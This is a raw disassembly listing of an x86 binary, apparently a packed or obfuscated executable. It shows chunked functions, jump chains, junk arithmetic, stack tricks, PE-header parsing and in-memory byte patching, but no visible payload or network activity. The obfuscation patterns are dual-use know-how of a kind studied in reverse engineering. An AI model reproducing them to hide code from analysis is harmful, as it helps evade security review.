; FUNCTION CHUNK AT 0044B5AE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452372 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454F5F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045825B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004596AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459742 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		shl	eax, 2
		cdq
		add	eax, [esp-4+arg_0]
		adc	edx, [esp-4+arg_4]
		jno	loc_44B0ED
		jmp	loc_43A8B7
sub_43EBB6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD2C

loc_43EBD0:				; CODE XREF: sub_43DD2C+14j
		mov	[ebp-20h], eax
		jmp	loc_4453D5
; END OF FUNCTION CHUNK	FOR sub_43DD2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E26C

loc_43EBD8:				; CODE XREF: sub_43E26C:loc_453E30j
		test	byte ptr [ebp-8], 40h
		jz	loc_4453D5
		push	ebp
		push	offset loc_455209
		jmp	loc_4547FE
; END OF FUNCTION CHUNK	FOR sub_43E26C
; ---------------------------------------------------------------------------

loc_43EBED:				; CODE XREF: hvvrg7ie:loc_442092j
		xchg	ecx, [esp]
		jmp	sub_442846
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_43EBF5:				; CODE XREF: sub_43B6A5:loc_45ABE1j
		jo	loc_451238
		mov	edi, [ebp+0]
		jg	loc_44973D
		cdq
		jmp	loc_43AE7D
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43EC0A:				; CODE XREF: sub_43EB47:loc_451DFAj
		jnz	loc_44E9A9
		jmp	loc_446DCC
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443163

loc_43EC15:				; CODE XREF: sub_443163:loc_44AA81j
		call	sub_450C5A
		call	sub_45ADE2

loc_43EC1F:				; CODE XREF: sub_444A76+9j
		jmp	sub_45190C
; END OF FUNCTION CHUNK	FOR sub_443163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_43EC24:				; CODE XREF: sub_43B547:loc_45882Dj
		jnz	loc_43D1C7
; END OF FUNCTION CHUNK	FOR sub_43B547
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_43EC2A:				; CODE XREF: sub_44CB64+7j
		jmp	loc_43DBEC
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452637

loc_43EC2F:				; CODE XREF: sub_452637-792Cj
		jmp	loc_44D4E7
; END OF FUNCTION CHUNK	FOR sub_452637
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447662

loc_43EC34:				; CODE XREF: hvvrg7ie:00439A26j
					; sub_447662+3j
		jmp	loc_45AB00
; END OF FUNCTION CHUNK	FOR sub_447662
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_43EC39:				; CODE XREF: sub_44E3B3-8297j
		jmp	loc_441DFD
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C562

loc_43EC3E:				; CODE XREF: sub_43C562+2412j
		jmp	loc_44FF71
; END OF FUNCTION CHUNK	FOR sub_43C562
; ---------------------------------------------------------------------------
		test	eax, 6AB0B996h
		jmp	loc_43D1B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_43EC4E:				; CODE XREF: sub_4554E8:loc_446BB0j
		jge	loc_44DAD5
		and	esi, edi
		pushf
		jmp	loc_452B54
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_43EC5C:				; CODE XREF: sub_45A0B1:loc_43D711j
					; hvvrg7ie:0044373Aj
		xchg	esi, edx
		mov	[edx], eax
		jmp	loc_445D1F
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_43EC65:				; CODE XREF: sub_451E1C:loc_44F250j
		mov	al, [ebp+var_A]
		shr	eax, 4
		push	offset sub_43A86A
		jmp	nullsub_212
; END OF FUNCTION CHUNK	FOR sub_451E1C

; =============== S U B	R O U T	I N E =======================================



sub_43EC75	proc near		; CODE XREF: sub_44B7CB-EA63p
					; hvvrg7ie:00447E2Fj

; FUNCTION CHUNK AT 00454343 SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	edx, ebp
		add	edx, 69EDB5B3h
		mov	edx, [edx]
		shr	edx, 3
		mov	ecx, ds:dword_448D10
		jmp	loc_454343
sub_43EC75	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4531B1

loc_43EC91:				; CODE XREF: sub_4531B1:loc_44941Bj
		add	edx, 0BD54A761h
		xchg	edx, [esp+0]
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_4531B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_521. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FE7

loc_43ECA0:				; CODE XREF: sub_456FE7+7j
		jmp	loc_439BA2
; END OF FUNCTION CHUNK	FOR sub_456FE7
; ---------------------------------------------------------------------------

loc_43ECA5:				; CODE XREF: hvvrg7ie:0043E6C6j
		jmp	loc_43F509

; =============== S U B	R O U T	I N E =======================================



sub_43ECAA	proc near		; CODE XREF: hvvrg7ie:0043AB89j
					; sub_441167+6p

; FUNCTION CHUNK AT 0043B86C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D161 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004412D2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044CF3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452AD3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004539B6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00453F5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004582C0 SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	ebp
		mov	eax, ds:dword_458D88
		jmp	loc_4412D2
sub_43ECAA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ebx, 0D227F01Eh
		jmp	loc_44DA83
; ---------------------------------------------------------------------------

loc_43ECC5:				; DATA XREF: sub_45A234:loc_444E1Eo
		xchg	esi, [esp]

loc_43ECC8:				; CODE XREF: hvvrg7ie:00440121j
		pushf
		push	3017D285h
		pop	eax
		sub	eax, ds:4000F4h
		rol	eax, 5
		sub	eax, 46C2F18Ah
		xor	eax, 0ED757708h
		jmp	loc_44A847
; ---------------------------------------------------------------------------

loc_43ECE9:				; DATA XREF: sub_4399AE:loc_43B89Bo
		xor	eax, 95C2EA69h
		add	eax, ebp
		push	offset sub_45264D
		jmp	locret_44DB94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B851

loc_43ECFB:				; CODE XREF: sub_43B851+10F2Cj
		jge	loc_458BF9

loc_43ED01:				; CODE XREF: sub_456DE7-11B0j
		jmp	nullsub_202
; END OF FUNCTION CHUNK	FOR sub_43B851
; ---------------------------------------------------------------------------
		mov	[eax], edx
		ror	eax, 9
		adc	ebx, edx
		jmp	loc_45307C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43ED12:				; CODE XREF: sub_44388C-E35j
		jz	loc_43D84A

loc_43ED18:				; CODE XREF: sub_43E128+1C21Dj
		jmp	loc_45063B
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43ED1D:				; CODE XREF: sub_450246+9D4Fj
		jmp	loc_43F079
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCC7

loc_43ED22:				; CODE XREF: sub_43CCC7+3D8Fj
		jmp	loc_45A831
; END OF FUNCTION CHUNK	FOR sub_43CCC7
; ---------------------------------------------------------------------------

loc_43ED27:				; CODE XREF: hvvrg7ie:00440170j
		jmp	loc_44C928
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C40C

loc_43ED2C:				; CODE XREF: sub_43C40C+10j
		jmp	loc_4420CE
; END OF FUNCTION CHUNK	FOR sub_43C40C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43ED31:				; CODE XREF: sub_450434-15EB0j
		jmp	loc_44B9EA
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		mov	[ebp+0], edx
		xchg	edx, ebx
		mov	ecx, [eax]
		jmp	loc_43D842
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_43ED42:				; CODE XREF: sub_43EF3E+9CA5j
		ror	ebp, 1Fh

loc_43ED45:				; CODE XREF: sub_43EF3E:loc_43EB00j
		call	sub_453E08
		mov	edx, 1AE260E8h

loc_43ED4F:				; CODE XREF: hvvrg7ie:0045502Ej
		call	sub_446A16

loc_43ED54:				; CODE XREF: hvvrg7ie:004560B7j
		jmp	loc_457823
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43ED59:				; CODE XREF: sub_44388C:loc_446D88j
		jz	loc_43C3D7
		call	sub_459CC4
		jnz	loc_44D6E4
		mov	ecx, [ebx+edx-4]
		jmp	loc_444D70
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_43ED73:				; CODE XREF: sub_444BE1:loc_45968Ej
		jz	loc_44E0A8

loc_43ED79:				; CODE XREF: hvvrg7ie:loc_43C34Ej
		jmp	loc_448044
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_43ED7E:				; CODE XREF: hvvrg7ie:00450509j
					; sub_4403D4+18DA9j
		rol	ebx, 14h
		jmp	loc_449C10
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------

loc_43ED86:				; CODE XREF: hvvrg7ie:loc_43DB90j
		jz	loc_459564
		jmp	loc_44C0D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43ED91:				; CODE XREF: sub_43C0DE:loc_44AD9Ej
					; sub_4589D3-1A02j
		and	ebx, 2511FCF4h
		rol	ebx, 1Fh
		and	ebx, ds:4000F6h
		jns	loc_448498

loc_43EDA6:				; CODE XREF: sub_43E163-15A5j
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		adc	ecx, 8BEE345Fh
		jmp	loc_44D89A
; ---------------------------------------------------------------------------
		cmp	edi, ebx
		jmp	loc_43AD38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEC3

loc_43EDBD:				; CODE XREF: sub_43DEC3:loc_43A303j
		rol	esi, 0Eh
		sub	esi, 44104121h
		add	esi, 640D7CB7h
		xchg	esi, [esp+8+var_8]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43DEC3
; ---------------------------------------------------------------------------

loc_43EDD4:				; CODE XREF: hvvrg7ie:loc_459DFFj
		push	5C26C4C6h
		pop	ecx
		or	ecx, 60F5E070h
		and	ecx, 0C8CD18DAh
		jmp	loc_43F9FE
; ---------------------------------------------------------------------------

loc_43EDEB:				; CODE XREF: hvvrg7ie:00449A6Bj
		or	edx, ebx
		jle	loc_43C390

loc_43EDF3:				; CODE XREF: hvvrg7ie:loc_445CC2j
		mov	eax, [esp]
		push	edi
		push	0A0CB9512h
		jmp	loc_456F79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585BB

loc_43EE01:				; CODE XREF: sub_4585BB:loc_43FD96j
		add	eax, 0A069948Bh
		sub	eax, 5E5F9BDh
		add	eax, 640DB37Dh
		and	ecx, eax
		pop	eax
		pop	edx
		jmp	loc_44E5DD
; END OF FUNCTION CHUNK	FOR sub_4585BB

; =============== S U B	R O U T	I N E =======================================



sub_43EE1C	proc near		; CODE XREF: hvvrg7ie:0044437Cj
					; hvvrg7ie:0044E9D8p

; FUNCTION CHUNK AT 00456B55 SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	eax, 13F176ECh
		add	eax, ebp
		add	eax, 4CF6DA0Bh
		jmp	loc_456B55
sub_43EE1C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43EE33	proc near		; CODE XREF: sub_43E7F3-65Fp
					; hvvrg7ie:0044E9FEj

var_34		= dword	ptr -34h
var_30		= dword	ptr -30h

; FUNCTION CHUNK AT 0043902B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043A0D7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440681 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445D83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446EA7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A43E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B648 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044FA01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450A03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004557FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458213 SIZE 00000017 BYTES

		xchg	edx, [esp+34h+var_34]
		pop	edx
		cmp	word ptr [eax],	2ECDh
		jz	loc_43EE47
		jmp	loc_43A0D7
; ---------------------------------------------------------------------------

loc_43EE47:				; CODE XREF: sub_43E7F3-668j
					; sub_43EE33+9j
		jns	loc_44B648
		jmp	loc_4557FD
sub_43EE33	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_237. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E813

loc_43EE53:				; CODE XREF: sub_43E813+18824j
		jmp	nullsub_263
; END OF FUNCTION CHUNK	FOR sub_43E813
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43EE58:				; CODE XREF: sub_43F227+12EE9j
					; sub_43F227:loc_45639Cj
		call	sub_44DE0A
		mov	edx, 20413B0Fh
		call	sub_43FDAE

loc_43EE67:				; CODE XREF: sub_4569F5:loc_44FCA4j
		sub	eax, 0CBAB4832h
		and	eax, 0D8F24D8Bh
		add	eax, 0B033883Eh
		push	offset sub_4414D3
		jmp	loc_43BE72
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_43EE83:				; CODE XREF: hvvrg7ie:004563D1j
		pop	eax
		jnb	loc_456196
		mov	eax, [esp]
		push	edx
		push	eax
		jmp	loc_44E574
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 15h
		mov	ds:dword_45A8CC, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D37

loc_43EE9F:				; CODE XREF: sub_454D37+490Ej
		jmp	loc_444F47
; END OF FUNCTION CHUNK	FOR sub_454D37
; ---------------------------------------------------------------------------

loc_43EEA4:				; CODE XREF: hvvrg7ie:004497BBj
		jmp	nullsub_356

; =============== S U B	R O U T	I N E =======================================



sub_43EEA9	proc near		; CODE XREF: sub_45202Bj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004396AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442F0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451996 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004569E6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B503 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_4396AE
sub_43EEA9	endp

; ---------------------------------------------------------------------------
		call	sub_44BD13

loc_43EEB4:				; CODE XREF: hvvrg7ie:004435D8j
		jmp	loc_458A76
; ---------------------------------------------------------------------------
		adc	edi, 0B54771B1h
		jmp	loc_45AEDB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_379. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43EEC5:				; CODE XREF: sub_43D285+1DBBFj
		jmp	loc_4558DC
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4581FB

loc_43EECA:				; CODE XREF: sub_4581FB+5j
		jmp	nullsub_304
; END OF FUNCTION CHUNK	FOR sub_4581FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4525FC

loc_43EECF:				; CODE XREF: sub_4525FC+8j
		jmp	loc_43AC8F
; END OF FUNCTION CHUNK	FOR sub_4525FC

; =============== S U B	R O U T	I N E =======================================



sub_43EED4	proc near		; CODE XREF: sub_451B35:loc_450519p

; FUNCTION CHUNK AT 00447391 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF70 SIZE 0000000D BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_43D9BE
		mov	eax, [ebp-4]

loc_43EEE8:				; CODE XREF: sub_450246:loc_440CD6j
		add	eax, 3Ch
		jmp	loc_44CF70
sub_43EED4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B78

loc_43EEF0:				; CODE XREF: sub_448B78+4j
		mov	esp, ebp
		xchg	ebx, [esp+0]
		push	ebx
		pop	ebp
		pop	ebx
		jmp	loc_44DE4F
; END OF FUNCTION CHUNK	FOR sub_448B78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED23

loc_43EEFD:				; CODE XREF: sub_44ED23:loc_451770j
		jl	loc_44DC18

loc_43EF03:				; CODE XREF: sub_446925-64F6j
		jmp	nullsub_412
; END OF FUNCTION CHUNK	FOR sub_44ED23
; ---------------------------------------------------------------------------
		sub	ebp, esi
		mov	esi, ebp
		test	edi, ecx
		jmp	loc_44DC09
; ---------------------------------------------------------------------------

loc_43EF13:				; CODE XREF: hvvrg7ie:loc_4403CAj
		mov	byte ptr [eax],	0C3h
		push	edx
		push	1D0833C7h
		pop	edx
		and	edx, 9D7B2748h
		test	edx, 4
		jmp	loc_454797
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_443. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43EF2F:				; CODE XREF: hvvrg7ie:0044E75Bj
		jmp	loc_43B10A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2D1

loc_43EF34:				; CODE XREF: sub_44A2D1+Ej
		jmp	loc_442880
; END OF FUNCTION CHUNK	FOR sub_44A2D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F4D

loc_43EF39:				; CODE XREF: sub_443F4D+10j
		jmp	loc_45665C
; END OF FUNCTION CHUNK	FOR sub_443F4D

; =============== S U B	R O U T	I N E =======================================



sub_43EF3E	proc near		; CODE XREF: hvvrg7ie:0044235Dj
					; sub_458706+7p

; FUNCTION CHUNK AT 0043EB00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043ED42 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043EFE2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442F66 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044402A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444310 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445D14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448BDD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457823 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045A139 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_43CDAC
		or	eax, eax
		jmp	loc_442F66
sub_43EF3E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C33E

loc_43EF55:				; CODE XREF: sub_44C33E:loc_440694j
		jnz	loc_44F8FA
; END OF FUNCTION CHUNK	FOR sub_44C33E
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_43EF5B:				; CODE XREF: sub_4527A1-93EDj
		jmp	nullsub_174
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
		pop	ebp
		popf
		jmp	loc_44F8FA
; ---------------------------------------------------------------------------

loc_43EF67:				; CODE XREF: hvvrg7ie:loc_440B49j
		mov	eax, [eax]
		push	ecx
		mov	ecx, ebp
		jmp	loc_43AC66
; ---------------------------------------------------------------------------

loc_43EF71:				; CODE XREF: hvvrg7ie:0043F62Aj
		jz	loc_44D509
		jmp	loc_44B30D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_43EF7C:				; CODE XREF: sub_4563DC:loc_45B3BEj
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		push	offset loc_44FB9C
		jmp	loc_43B7F6
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_43EF8C:				; CODE XREF: sub_44989C:loc_43CB67j
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		nop
		mov	eax, [esp+4+var_4]
		call	sub_43E7F3
		jmp	loc_44A1F1
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_43EFA0:				; CODE XREF: sub_43E128:loc_4544FCj
		xor	eax, 3E5CC923h
		jmp	loc_449A1C
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_43EFAB:				; CODE XREF: hvvrg7ie:0044111Cj
		push	0D5A0307Fh
		pop	edx
		xor	edx, 0C5A51B52h
		sub	edx, 0FD5CB979h
		jns	loc_45069A

loc_43EFC3:				; CODE XREF: hvvrg7ie:0044BF0Cj
		jmp	sub_44059F
; ---------------------------------------------------------------------------

loc_43EFC8:				; CODE XREF: hvvrg7ie:0044592Dj
		jmp	loc_43C871
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452637

loc_43EFCD:				; CODE XREF: sub_452637+11j
		pop	edi
		and	edi, 0BB58839Ch
		rol	edi, 0Eh
		test	edi, 100000h
		jmp	loc_44034F
; END OF FUNCTION CHUNK	FOR sub_452637
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_43EFE2:				; CODE XREF: sub_43EF3E:loc_442F66j
		jnz	loc_44402A
		jmp	loc_43EB00
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AEE1

loc_43EFED:				; CODE XREF: sub_45AEE1:loc_43FC75j
		xchg	ebx, [edx]
		jmp	loc_43C07E
; END OF FUNCTION CHUNK	FOR sub_45AEE1
; ---------------------------------------------------------------------------
		push	9EDD6D62h
		pop	eax
		or	eax, 76A743E7h
		xor	eax, 0E0F4AB22h
		jnz	loc_44A363
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_43F00C:				; CODE XREF: sub_4462F9+1360Fj
		jmp	loc_445EA4
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_43F011:				; CODE XREF: sub_45196D+5DC3j
		jmp	loc_43F7F9
; END OF FUNCTION CHUNK	FOR sub_45196D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43F016:				; CODE XREF: sub_4465A6-CAFBj
		jmp	loc_457FC2
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		mov	[ebp+0], ebx
		jmp	loc_453E6F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_43F024:				; CODE XREF: sub_44BFF5+731Ej
		add	eax, 0F3BCD16Eh
		add	eax, ebp
		add	eax, 1762206Ah
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_455416
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465E5

loc_43F043:				; CODE XREF: sub_4465E5+1AFj
		jnz	loc_43DE44
		jmp	loc_448860
; END OF FUNCTION CHUNK	FOR sub_4465E5
; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-8], 0
		jz	loc_44DC92
		jmp	loc_44468B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444CF3

loc_43F05D:				; CODE XREF: sub_444CF3:loc_444CF9j
		and	ebx, 423B49A4h
		add	ebx, 0C03CDE2Ah
		xchg	ebx, [esp+4+var_4]

loc_43F06C:				; CODE XREF: sub_44BEBB-10A3Dj
		jmp	loc_447136
; END OF FUNCTION CHUNK	FOR sub_444CF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C9

loc_43F071:				; CODE XREF: sub_45A4C9:loc_4525DAj
		xchg	edx, [esp+0]
		jmp	sub_44B69F
; END OF FUNCTION CHUNK	FOR sub_45A4C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_43F079:				; CODE XREF: sub_450246:loc_43ED1Dj
		add	edx, 0FDBDBAD5h
		add	edx, ebp
		add	edx, 0CD8710EDh
		mov	edx, [edx]
		push	edx
		mov	edx, ebx
		call	sub_450246

loc_43F091:				; CODE XREF: sub_45A7F7:loc_45A80Ej
		jnz	loc_44893F
		not	edx
		sbb	eax, esi
		jmp	loc_44893F
; END OF FUNCTION CHUNK	FOR sub_450246
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43F0A1	proc near		; CODE XREF: hvvrg7ie:0044832Cj
					; sub_44809F+EBE7p

; FUNCTION CHUNK AT 00440705 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441E62 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450487 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		cmp	dword ptr [eax-0Ch], 4
		jnz	loc_43F0B8
		add	dword ptr [ebp-8], 4
		jmp	loc_440705
; ---------------------------------------------------------------------------

loc_43F0B8:				; CODE XREF: sub_43F0A1+8j
		push	offset loc_451CD2
		jmp	loc_450487
sub_43F0A1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	ecx, ebp
		jmp	sub_43FA03
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43F0C9:				; CODE XREF: sub_450434-11244j
		cmp	al, 0A4h
		jz	loc_439017
		jmp	loc_444A12
; END OF FUNCTION CHUNK	FOR sub_450434
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F0D7:				; CODE XREF: hvvrg7ie:0044C0ACj
		jmp	loc_456546
; ---------------------------------------------------------------------------

loc_43F0DC:				; CODE XREF: hvvrg7ie:004533D6j
		add	ecx, eax
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43F0DE:				; CODE XREF: sub_440643:loc_4533BFj
		add	eax, 96D5444Eh
		sub	eax, 416DFA05h
		rol	eax, 16h
		add	eax, 8DCB09ECh
		push	offset sub_456FBD
		jmp	nullsub_411
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------

loc_43F0FD:				; CODE XREF: hvvrg7ie:0045A7D1j
		shr	ebp, 0Bh
		popf
		ja	loc_45B994
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_43F107:				; CODE XREF: sub_457F50:loc_45A7BFj
		add	edi, 60C5330Bh
		xchg	edi, [esp+0]
		jmp	loc_448D8C
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 0F3h
		dd 0E9000007h, 0FFFFC699h, 0F5D3C0F7h, 55E99435h
					; CODE XREF: sub_446F26+75F1j
		db 0DAh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446356

loc_43F12B:				; CODE XREF: sub_446356:loc_448E8Dj
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		push	offset loc_43E979

loc_43F135:				; CODE XREF: hvvrg7ie:loc_4407D0j
		jmp	nullsub_193
; END OF FUNCTION CHUNK	FOR sub_446356

; =============== S U B	R O U T	I N E =======================================



sub_43F13A	proc near		; DATA XREF: hvvrg7ie:loc_44B713o

; FUNCTION CHUNK AT 0043F354 SIZE 0000000B BYTES
